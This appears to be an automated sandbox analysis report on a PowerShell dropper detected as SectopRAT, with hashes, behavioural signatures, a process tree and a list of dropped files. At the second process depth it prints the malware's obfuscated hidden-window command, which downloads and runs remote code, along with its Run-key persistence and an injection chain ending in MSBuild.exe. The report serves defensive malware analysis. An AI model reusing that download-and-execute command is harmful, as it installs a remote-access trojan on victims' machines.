Analysis
- max time kernel: 102s
- max time network: 95s
- platform: windows10-ltsc_2021_x64
- resource: win10ltsc2021-20250314-en
- resource tags: arch:x64, arch:x86, image:win10ltsc2021-20250314-en, locale:en-us, os:windows10-ltsc_2021-x64, system
- submitted: 26/03/2025, 14:33
Static task
static1
General
- Target: run.ps1
- Size: 141B
- MD5: 6fe6ee6a496894b815dd186af8babae5
- SHA1: 513ccf808eeeadd1d3d2c177e74534badb86fcfe
- SHA256: b59c1eea07af1ef9c70705b34f09f3929b12c4df4e31597c0f62a8847157ed1f
- SHA512: 11e8b51b7af82c2221a4a863abff54405781be1e4751a6b408f4dd88762a53273eb2b8e89ad611444c47d9c043224773be340561d780dd99ab74777c8256c795
Malware Config
Signatures
- SectopRAT payload (1 IoC)
  resource: behavioral1/memory/5216-110-0x0000000000E00000-0x0000000000ED4000-memory.dmp, yara_rule: family_sectoprat
- Sectoprat family
- Blocklisted process makes network request (1 IoC)
  flow 7, pid 1188, powershell.exe
- Executes dropped EXE (4 IoCs)
  pid 6064 kato.exe; pid 3776 kato.exe; pid 2964 TiVoDiag.exe; pid 4460 TiVoDiag.exe
- Loads dropped DLL (7 IoCs)
  pid 3776 kato.exe; pid 2964 TiVoDiag.exe (x3); pid 4460 TiVoDiag.exe (x3)
- Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str): \REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kato.exe = "C:\\Users\\Admin\\AppData\\Roaming\\KD8Y0n1n\\kato.exe", Process: powershell.exe
- Command and Scripting Interpreter: PowerShell (2 IoCs)
  pid 4612 powershell.exe; pid 1188 powershell.exe
- Suspicious use of SetThreadContext (2 IoCs)
  PID 4460 set thread context of 5932 (pid 4460, TiVoDiag.exe, target 97)
  PID 5932 set thread context of 5216 (pid 5932, cmd.exe, target 99)
- System Location Discovery: System Language Discovery (1 TTP, 4 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by TiVoDiag.exe (x2), cmd.exe, MSBuild.exe
- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  pid 4612 powershell.exe (x2); pid 1188 powershell.exe (x2); pid 2964 TiVoDiag.exe; pid 4460 TiVoDiag.exe (x2); pid 5932 cmd.exe (x2)
- Suspicious behavior: MapViewOfSection (3 IoCs)
  pid 4460 TiVoDiag.exe; pid 5932 cmd.exe (x2)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege, pid 4612 powershell.exe
  Token: SeDebugPrivilege, pid 1188 powershell.exe
  Token: SeDebugPrivilege, pid 5216 MSBuild.exe
- Suspicious use of WriteProcessMemory (21 IoCs)
  PID 4612 wrote to memory of 1188 (pid 4612, powershell.exe, target 84) x2
  PID 1188 wrote to memory of 6064 (pid 1188, powershell.exe, target 93) x2
  PID 6064 wrote to memory of 3776 (pid 6064, kato.exe, target 94) x2
  PID 3776 wrote to memory of 2964 (pid 3776, kato.exe, target 95) x3
  PID 2964 wrote to memory of 4460 (pid 2964, TiVoDiag.exe, target 96) x3
  PID 4460 wrote to memory of 5932 (pid 4460, TiVoDiag.exe, target 97) x4
  PID 5932 wrote to memory of 5216 (pid 5932, cmd.exe, target 99) x5
Processes
- Depth 1: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps1
  PID: 4612
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- Depth 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W H "&{ iex ( iwr ( ('https://[email protected]/temp/wEotIbaw#.txt') -split '[#@*]+' -join '' ) -UseBasicParsing ).Content }"
  PID: 1188
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- Depth 3: C:\Users\Admin\AppData\Roaming\KD8Y0n1n\kato.exe
  Command line: "C:\Users\Admin\AppData\Roaming\KD8Y0n1n\kato.exe"
  PID: 6064
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
- Depth 4: C:\Windows\TEMP\{F5AB2627-01BA-4831-A10E-173E5244715D}\.cr\kato.exe
  Command line: "C:\Windows\TEMP\{F5AB2627-01BA-4831-A10E-173E5244715D}\.cr\kato.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\KD8Y0n1n\kato.exe" -burn.filehandle.attached=640 -burn.filehandle.self=644
  PID: 3776
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
- Depth 5: C:\Windows\TEMP\{90E71157-C08C-4DC0-8EAC-7F01CC2D0F69}\.ba\TiVoDiag.exe
  Command line: C:\Windows\TEMP\{90E71157-C08C-4DC0-8EAC-7F01CC2D0F69}\.ba\TiVoDiag.exe
  PID: 2964
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
- Depth 6: C:\Users\Admin\AppData\Roaming\debugDemo\TiVoDiag.exe
  Command line: C:\Users\Admin\AppData\Roaming\debugDemo\TiVoDiag.exe
  PID: 4460
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
- Depth 7: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\SysWOW64\cmd.exe
  PID: 5932
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
- Depth 8: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  PID: 5216
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3KB
  MD5: d284e7ae3997969d312c6e20c8eaa3ac
  SHA1: 7681d49355053dc9efae6ba5bd893ba0518f9315
  SHA256: 03bdec025bd5fdc7bcf3efa6d4baf21d6cdedde935bceda65858a30125d4b456
  SHA512: 47b4b62f6099eea6a5a84e7ff246f7f537db22e36039b8b1ec95e8375723c5185afc8e5581f7f3f25931c701d36bbe562fcdc68499aa5916ef4bb1a366bd1e6d
- Filesize: 64B
  MD5: 067b7e92295dc36fa9e6293641ff06e1
  SHA1: 7da84ff603265697db7ef5afd6286d30292e04b9
  SHA256: c54f69103b33c8e778c945142dfc3db4cdc439171c46fda006d3fe47cd8e8417
  SHA512: df3719a351346a89776064162800797aebbf6f104de51cc97cf1f03f50eb1d99ff77a7d39c10a3497319268fd3b5a8486ecf36dccd2386af93e7b404e64be764
- Filesize: 1.6MB
  MD5: 72128553c9b8eb2e14330a6484cfd5ee
  SHA1: 475b5201ae76c420a813b539723a74e19a6e744b
  SHA256: 746a17b27bc23765245abd6d64944b05d1c879f9926f31744bd06882120c6a89
  SHA512: 5243ab89fa9995fbfcf45db53848ef7b128e915b3f3947c0bb70a773b7d94bbd1fee0fb308802f79508b3965fe0accd959f27def6883895dff47b4e29398dca7
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 3.0MB
  MD5: e5f6219b54266957ab0da8224f0fd830
  SHA1: cb5d9bc8901daea8fcc4ed4b97aaaa1651ead30c
  SHA256: a4c67af2f732b249f2879a3334006713a8f0aa07f771a80065cbfa6b4637a403
  SHA512: 83fbef2bdc90e61f622769f0f28936388dad7cf321f1df67af9819724de1d65a4d5624b885bbda80ac8a372e5408585adbef34860e43d54fc12e456182e5564e
- Filesize: 467KB
  MD5: c058b36fb6b007c2920604229b1fa0a3
  SHA1: 1377c5c47f08ffabb6a3359cdc2c3b5c8df958bb
  SHA256: 37cc3ebff3b7b7e55e8a8cc8785449152c6b119d25bacc6671b089dca7998ca2
  SHA512: a53f211cae71d083bb3fd6c2918384ed00a5b35cf67f28544303111e05abbc464b8033d649957a0665ff32c2180b594e3fbd66f90c4f783e2e8ee5d6865108c3
- Filesize: 1.3MB
  MD5: 7b0a2c7dcbaf47949428b8f82570fa89
  SHA1: c85af70092b1d97d28aef786e97507c748359724
  SHA256: f3b12aa0fa6d27a0c9401d0c0b7a564b342a7e1d65f0827a139ac505db0d4e85
  SHA512: 7377ebe6e2fc625718c8a94b190b5ec211307a4dbb672dcbc1efc95cc57a26138ebc150b52aea06cc26002ad0bdd876eb8bb6cbe8303b9fd51646fe29f4d1f08
- Filesize: 1.3MB
  MD5: 9882ac3b1c5d3f27475cdcf2edd6694f
  SHA1: 3a01679cab83c493ed0bcd946c50c2c675a0a270
  SHA256: 6a73fb33a020f62b03ba576d4627ec87f1d7af73066a16a5290b4db0042c0b3c
  SHA512: 7a35ed2179b479afebbf386b7cbd5c2d301cc2778708dfcebb5ac2c658d86578b1161149a66623f18dd0b193da5acc819f27d14ef2f703567ee84a7b67f4d992
- Filesize: 815KB
  MD5: 379ba636ef26aa22b2636bb0ba2876d2
  SHA1: 5d1b53d63b9de9138e1a679a928d9cf34413711f
  SHA256: 70ea7dcb7e15202e806cf8e3d3f250c1432c1af01c25a440f55fd07eec4913ad
  SHA512: 066a456cc7ae9b16e5293cf979d5f0bae2ad095b76925a7f9aa1ab184d468b40bbe6d81655fb97766d786fa1bc7174f3c5b76f6e0de3205f60e09a4e69f992f5
- Filesize: 55KB
  MD5: df4f621ea64bac21c2051ef4a2e9cb30
  SHA1: 03cc13749b9b73223df4820d9568b262488aacab
  SHA256: e2f35cd3969c76969aca8720d6bd3bdc4b2d77785c797c2b51ff9646aea7e3e6
  SHA512: c3efe090cb9f0363c80c60e1f1b4e8a0688a26ed6062aaa9df0afbaa6700227fe8527e21dcb03442ff99f4a8c1a02e021c5520102f55311a7a56798708f37158
- Filesize: 535KB
  MD5: b86ca5c4e56fedb923332528bf09ef48
  SHA1: 251ba312b1461270d866510fb7fc9b8dd42740d3
  SHA256: 08f820cffb07375c795ab336dc248be94457e44f6b2fabd3c6d27230a41d98d2
  SHA512: c6d71ff960dc288931443cbfb9a3786b317f19206359d4842f7e3d1c304a4cd61a177ed058899da678bc2ba50b4235e4267889762cd98c46e4d0a35d0523cfc8
- Filesize: 2.9MB
  MD5: ee5d43fee47f62dc57e5e509fd6a9056
  SHA1: 0dafc5b4458d61986988dcf7e90c4ab5c13d15de
  SHA256: 1c331c776a850d970d39be136659746c0729c393b6e6c934f1ab1c9075f76973
  SHA512: e2180ca5d43b87723705bb9a4a4e1c13bea2f8bf12aa7bb798cdbf68b5acc6c731d8c07b839b2e1749c8c6135899201a2389bc75669301337ec7da46b0827ec5